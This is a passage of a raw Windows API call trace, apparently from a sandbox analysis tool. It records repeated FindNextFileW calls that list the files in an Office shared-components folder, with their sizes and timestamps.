CoTaskMemFree (pv=0x4fe370) [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703dbc00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xd80a4ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x703dbc00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x310788, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd80f11a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xb5db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEERR.DLL", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xf73a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEES.DLL", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x6bfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEEXCH.DLL", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xdbb98, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEEXCL.DLL", cAlternateFileName="")) returned 1 [0046.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x53bb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODBC.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODDBS.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODEXL.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODTXT.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8189720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x833a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEOLEDB.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96faef00, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd8247e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x96faef00, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x6e398, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACER3X.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0xd9c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACERCLR.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xa8da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEREP.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82940c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x48990, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACETXT.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1092c00, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xd82ba220, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1092c00, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x2e8da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEWDAT.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0c9f00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xcf0c7d40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8e0c9f00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x4dba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEWSS.DLL", cAlternateFileName="")) returned 1 [0046.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82e0380, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x7a998, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEXBE.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67c38700, ftCreationTime.dwHighDateTime=0x1cbc9fc, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x67c38700, ftLastWriteTime.dwHighDateTime=0x1cbc9fc, nFileSizeHigh=0x0, nFileSizeLow=0x5e158, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATLCONV.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb10f7500, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0xda5b0540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb10f7500, ftLastWriteTime.dwHighDateTime=0x1cbe56c, nFileSizeHigh=0x0, nFileSizeLow=0x4d67b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Csi.dll", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef87d800, ftCreationTime.dwHighDateTime=0x1cb8cce, ftLastAccessTime.dwLowDateTime=0xda5d66a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xef87d800, ftLastWriteTime.dwHighDateTime=0x1cb8cce, nFileSizeHigh=0x0, nFileSizeLow=0x1b3980, dwReserved0=0x0, dwReserved1=0x0, cFileName="CsiSoap.dll", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cultures", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x7eb48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ebd7300, ftCreationTime.dwHighDateTime=0x1cba5c3, ftLastAccessTime.dwLowDateTime=0xcef710e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3ebd7300, ftLastWriteTime.dwHighDateTime=0x1cba5c3, nFileSizeHigh=0x0, nFileSizeLow=0x21d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXP_PDF.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5bf6900, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xcf5b0aa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf5bf6900, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0x11578, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXP_XPS.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66e7600, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xe572de20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd66e7600, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x26560, dwReserved0=0x0, dwReserved1=0x0, cFileName="FLTLDR.EXE", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bf3f00, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x53907610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7bf3f00, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x417360, dwReserved0=0x0, dwReserved1=0x0, cFileName="IACOM2.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x31d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc821f600, ftCreationTime.dwHighDateTime=0x1cbdfb3, ftLastAccessTime.dwLowDateTime=0xd776b9a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc821f600, ftLastWriteTime.dwHighDateTime=0x1cbdfb3, nFileSizeHigh=0x0, nFileSizeLow=0x183d780, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO.DLL", cAlternateFileName="")) returned 1 [0046.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee94c400, ftCreationTime.dwHighDateTime=0x1cb7007, ftLastAccessTime.dwLowDateTime=0xd6225500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xee94c400, ftLastWriteTime.dwHighDateTime=0x1cb7007, nFileSizeHigh=0x0, nFileSizeLow=0x73b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOICONS.EXE", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e15000, ftCreationTime.dwHighDateTime=0x1cbf3e5, ftLastAccessTime.dwLowDateTime=0xec32f3e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe5e15000, ftLastWriteTime.dwHighDateTime=0x1cbf3e5, nFileSizeHigh=0x0, nFileSizeLow=0x4529780, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSORES.DLL", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4293d00, ftCreationTime.dwHighDateTime=0x1cbc468, ftLastAccessTime.dwLowDateTime=0xd77dddc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa4293d00, ftLastWriteTime.dwHighDateTime=0x1cbc468, nFileSizeHigh=0x0, nFileSizeLow=0x135f90, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoshext.dll", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc276d800, ftCreationTime.dwHighDateTime=0x1cab8aa, ftLastAccessTime.dwLowDateTime=0x6a050eb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc276d800, ftLastWriteTime.dwHighDateTime=0x1cab8aa, nFileSizeHigh=0x0, nFileSizeLow=0xdb50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOXEV.DLL", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x1d950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOXMLED.EXE", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0xdb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOXMLMF.DLL", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3922200, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3922200, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x124980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPTLS.DLL", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d97a00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15d97a00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0xac370, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSSOAP30.DLL", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8054ff00, ftCreationTime.dwHighDateTime=0x1cb7011, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8054ff00, ftLastWriteTime.dwHighDateTime=0x1cb7011, nFileSizeHigh=0x0, nFileSizeLow=0x1a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MUAUTH.CAB", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8054ff00, ftCreationTime.dwHighDateTime=0x1cb7011, ftLastAccessTime.dwLowDateTime=0xcf47ffa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8054ff00, ftLastWriteTime.dwHighDateTime=0x1cb7011, nFileSizeHigh=0x0, nFileSizeLow=0x6190, dwReserved0=0x0, dwReserved1=0x0, cFileName="MUOPTIN.DLL", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x161d5800, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xd63a22c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x161d5800, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x38d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oarpmany.exe", cAlternateFileName="")) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9d2900, ftCreationTime.dwHighDateTime=0x1cab9ac, ftLastAccessTime.dwLowDateTime=0xbe0f9da0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7f9d2900, ftLastWriteTime.dwHighDateTime=0x1cab9ac, nFileSizeHigh=0x0, nFileSizeLow=0x7568, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODBCMON.DLL", cAlternateFileName="")) returned 1 [0046.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 1 [0046.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6bc953f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x2560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0046.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6c2166d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x4d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="OPHPROXY.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a43200, ftCreationTime.dwHighDateTime=0x1cb700e, ftLastAccessTime.dwLowDateTime=0xcf47ffa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf6a43200, ftLastWriteTime.dwHighDateTime=0x1cb700e, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OPTINPS.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, 